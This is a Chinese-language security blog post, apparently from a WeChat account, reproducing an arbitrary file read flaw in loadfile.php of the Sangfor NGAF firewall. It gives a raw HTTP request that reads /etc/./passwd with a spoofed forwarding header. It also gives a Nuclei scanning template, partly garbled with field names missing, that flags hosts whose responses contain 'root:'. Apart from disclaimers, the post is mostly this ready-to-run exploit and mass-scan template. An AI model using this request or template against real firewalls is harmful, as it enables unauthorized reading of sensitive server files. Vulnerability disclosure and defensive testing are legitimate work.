公众号新规只对常读和星标的公众号才能展示大图推送,建议大家把公众号“night安全”设为星标,否则可能就看不到啦!
免责声明
night安全致力于分享技术学习和工具掌握。然而请注意不得将此用于任何未经授权的非法行为,请您严格遵守国家信息安全法律法规。任何违反法律、法规的行为,均与本人无关。如有侵权烦请告知,我们会立即删除并致歉。谢谢!
漏洞概述
深信服下一代防火墙(Next-Generation Application Firewall)NGAF是面向应用层设计,能够精确识别用户、应用和内容,具备完整安全防护能力,能够全面替代传统防火墙,并具有强劲应用层处理能力的全新网络安全设备。
该系统loadfile.php存在任意文件读取漏洞,攻击者可利用该漏洞直接读取服务器敏感文件。
漏洞复现
POC:
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1Host: xxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0Content-Length: 35Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedy-forwarded-for: 127.0.0.1
NUCLEI POC
id: sangfor-ngaf-loadfile-filereadinfo:name: 深信服NGAF防火墙管理系统loadfile.php任意文件读取漏洞author: YGnightseverity: highdescription: descriptionreference:https://metadata:verified: true: 1tags: sangforrequests:raw:|+GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1Host: {{Hostname}}: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: gzip, deflate, br: 127.0.0.1Connection: close: andmatchers:type: statusstatus:200type: wordwords:'root:'
扫码关注
获得更多资讯
原文始发于微信公众号(night安全):【漏洞复现】深信服下一代防火墙NGAF管理系统loadfile.php任意文件读取漏洞 附POC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论